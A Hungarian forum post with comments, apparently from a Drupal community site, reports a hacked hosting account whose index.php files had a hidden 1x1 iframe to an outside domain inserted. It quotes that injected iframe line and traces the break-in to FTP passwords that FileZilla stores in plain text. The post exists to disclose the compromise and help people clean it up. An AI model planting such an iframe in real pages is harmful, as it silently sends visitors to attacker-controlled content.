Ma reggel az egyik ügyfelem [tárhelyszolgáltató neve törölve] tárhelyén ezt találtam az index.php fáljok elején:
<iframe src="http://gratwall.vv.cc/showthread.php?t=80480463" width="1" height="1" frameborder="0"></iframe>
Először gzip tömörítési problémára gyanakodtam, mert a címlapot lekérve ilyen hibaüzenetek jöttek:
Chrome: 330net::ERR_CONTENT_DECODING_FAILED
Safari: cannot decode raw data” (CFURLErrorDomain:-1015)
Közben kiderült, hogy a tárhelyet nyilvánvalóan feltörték, és a fenti kódot szúrták be az index.php elejére. Elképzelhető, hogy a látszólagos tömörítési probléma mögött is a feltörés áll, bár nem kizárt, hogy két külön problémával állunk szemben.
Ha náluk van a webhelyed, szedd ki a fenti iframe kódot az index.php elejéről, és jelezd a problémát az ügyfélszolgálatnak.
Joomla is szintén zenész
Úgy tűnik Joomlákat is törtek, tehát biztosan nem Drupal probléma.
FileZilla jelszótárolás
Újabb fejlemények: ügyfél Windows Vista gépe a hétvégén beszedett valami vírust, és le volt tárolva a FileZillában a jelszó. Lehet (valószínű), hogy innen indult a betörés, és nem a tárhelyszolgáltató szerveréről.
Tanulságok: a FileZilla 3-as, hasonlóan más FTP programokhoz, kódolatlanul, egyszerű xml fájoklban tárolja a jelszavakat és más bejelentkezési információkat. (Ez megváltozott, a 2-esben még megvolt a kódolás.) Windows gépeken ez különösen problematikus. Ne mentsük le a jelszavakat, ez a legegyszerűbb megoldás.
Jelszavak tárolására én a
Jelszavak tárolására én a KeePassX nevű szoftvert használom. Van linux-ra, mac-re, windows-ra és opensource.
Hosszu Kálmán
http://twitter.com/kalmanhosszu
http://www.kalman-hosszu.com/
http://premiumcmsthemes.com/
csak hogy legyen alternatíva
én a 1password alkalmazást használom pont ugyan erre. nincs linuxra és nem openszorsz viszont most nézem, van androidra is. :)
-
clear: both;
KeePassX-hez androidos
KeePassX-hez androidos kliens: KeePassDroid.
akkor egy másik indok ;)
perfektli overprajszd, cserebe kapod, hogy anbelivebli bjutiful. a drodios verzio annyira nem erint, gondoltam masnak fontos lehet.
-
clear: both;
vot káind ov dájaelekt duju
vot káind ov dájaelekt duju szpik? :)
Igen, sajnos ismert és elég
Igen, sajnos ismert és elég gyakori is a probléma:
http://blog.webpozitiv.hu/bejelentett-tamado-webhely-mit-tegyek/